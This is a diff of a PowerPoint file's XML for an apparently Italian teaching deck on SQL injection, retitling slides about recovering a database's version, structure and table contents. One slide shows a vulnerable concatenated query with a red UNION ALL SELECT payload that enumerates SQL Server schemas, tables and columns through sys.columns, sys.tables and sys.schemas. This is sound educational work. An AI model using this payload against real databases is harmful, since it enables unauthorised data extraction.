-              <a:t>T.schema_id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> ORDER BY 2--</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>%' ORDER BY StartDate;</a:t>
-            </a:r>
-            <a:endParaRPr sz="1400" dirty="0">
-              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="606615157"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -12717,34 +13115,22 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Recuperare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
+              <a:t> la </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>versione</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t> del database server**</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -12975,6 +13361,431 @@
 </file>
 
 <file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFF40531-5418-D238-DA56-5FBD9EE743E3}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67786EA0-FB50-F4E4-40B4-ED11F90D9FBF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Recuperare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> la </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>struttura</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> del database*</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85D4787-33B1-E75D-99CB-1D54A1200C5E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32A16D06-AE54-6BF4-ADE9-45C93D634A35}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1441500" y="2123627"/>
+            <a:ext cx="6261000" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, CONCAT(S.name, '.', T.name, '.', C.name), NULL, NULL, NULL, NULL FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>sys.columns</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> C INNER JOIN </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>sys.tables</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> T ON </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>T.object_id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>C.object_id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> INNER JOIN </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>sys.schemas</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> S ON </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>S.schema_id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>T.schema_id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> ORDER BY 2--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="606615157"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -13028,34 +13839,22 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Recuperare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
+              <a:t> la </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>struttura</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t> del database**</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -13302,7 +14101,159 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4361B430-5B6A-C8D7-8A70-FFCAC48A7AC0}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C202F62D-4E1A-92ED-8345-1E40DDE88C71}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Recuperare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> la </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>struttura</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> del database</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B9BD06F-8ADA-8BDC-CD8E-740CE39B1F12}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC949810-8240-554C-A042-21CCCBF25BE4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3866890" y="1883207"/>
+            <a:ext cx="1410219" cy="2709738"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3737538960"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide16.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -13367,7 +14318,15 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Recuperare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> il </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>contenuto</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -13375,7 +14334,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>una</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -13383,7 +14342,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t>tabella</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -13685,7 +14644,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide17.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -13693,7 +14652,7 @@
         <p:cNvPr id="1" name="Shape 127">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D5526D9-5742-D200-6B3B-A32F00BE6A62}"/>
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3796AD8C-2551-245C-DE9B-3C771744E328}"/>
             </a:ext>
           </a:extLst>
         </p:cNvPr>
@@ -13713,7 +14672,7 @@
           <p:cNvPr id="128" name="Google Shape;128;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC44BA00-2477-7776-957D-BACCC5B049AA}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7295EA24-FC0F-702F-52C6-C2547316E2AA}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -13750,7 +14709,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una GRAN buona password…</a:t>
+              <a:t>SQL Injection #3: query concatenating</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -13761,7 +14720,7 @@
           <p:cNvPr id="129" name="Google Shape;129;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAED3D2-B059-E84F-199C-B14D40191AEE}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC7427D-4845-0F2A-5CB7-1DF8933DEA40}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -13795,7 +14754,7 @@
           <p:cNvPr id="130" name="Google Shape;130;p31">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E78ACA2-9C6B-93DB-65AB-03207AC10BA2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59C7CD34-6206-4422-B95D-231F419789C4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -13946,7 +14905,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="905619501"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2397643867"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -13956,7 +14915,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide16.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide18.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14010,18 +14969,10 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
+            <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una GRAN buona password…</a:t>
+              <a:t>SQL Injection #3: query concatenating</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -14247,7 +15198,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide17.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide19.xml><?xml version="1.0" encoding="utf-8"?>
